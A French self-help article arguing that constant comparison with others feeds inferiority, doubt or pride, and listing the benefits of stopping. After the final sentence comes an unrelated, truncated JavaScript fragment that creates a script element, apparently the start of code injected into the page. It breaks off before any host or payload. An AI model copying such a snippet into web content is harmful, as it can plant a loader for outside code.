Se comparer

Nous ne cessons de nous comparer à ceux qui sont plus brillants, plus intelligents, plus riches, etc. Cette habitude de se comparer aux autres est d’autant plus forte que notre mode de fonctionnement actuel est axé sur la performance. Cela joue un rôle important dans nos vies et pourtant c’est une des principales causes de conflits.

Il est certains cas précis où la comparaison va avoir un effet positif sur nous, quand elle va nous permettre de puiser des forces insoupçonnées en nous, lors de compétitions sportives par exemple. Il en est de même dans la réalisation d’un mouvement « juste » où l’on va calquer sa position sur la position la plus adéquate. Mais en règle générale, le fait d’arrêter de se comparer aux autres est un atout important pour vivre en paix et serein.

Chacun est différent de part sa personnalité, son vécu, son milieu de vie, ses relations, donc il est vain de vouloir se comparer car il n’y a pas deux personnes semblables. La comparaison ne veut rien dire, elle n’exprime rien de cohérent. La comparaison pousse au jugement de valeur. Si l’on se considère comme inférieur aux autres, cela va nous renforcer dans un complexe d’infériorité, dans le doute et au contraire le fait de se sentir supérieur va faire naître l’autosuffisance et l’orgueil.

Se comparer, c’est aussi figer une image de soi à un moment donné, à un instant « t », alors que nous sommes en constant changement et en perpétuelle évolution. C’est s’attacher à une image subjective qui ne pourra jamais prendre en compte toutes les données, c’est se vouer à un processus réducteur. Car quand on se compare à quelqu’un, on se focalise, bien souvent, sur le seul aspect dans lequel il apparaît comme meilleur, sans tenir compte des conditions dans lesquelles cette personne est arrivée à cette réussite, ni ce qu’il en advient.

Arrêter de se comparer va permettre de :

  • renforcer sa confiance en soi en révélant nos propres capacités et ressources.
  • ouvrir notre champ de possibilité : En cherchant à avoir plus que le voisin, on se limite à ce qui existe déjà, tandis que si on sort du connu, on est ouvert aux différentes opportunités et à l’innovation.
  • d’aller au-delà de soi : Par exemple quelqu’un qui a un talent très important ne va pas s’épanouir au maximum de ses possibilités, s’il se compare à des personnes qui n’ont pas atteint son niveau.
  • se focaliser sur l’essentiel pour progresser et ne pas disperser son énergie dans une vaine compétition avec les autres.
  • rester en contact avec son identité et ses perspectives personnelles.

Nous sommes tous uniques et c’est de nos différences que nous pouvons nous enrichir mutuellement.

 var d=document;var s=d.createElement(‘script’);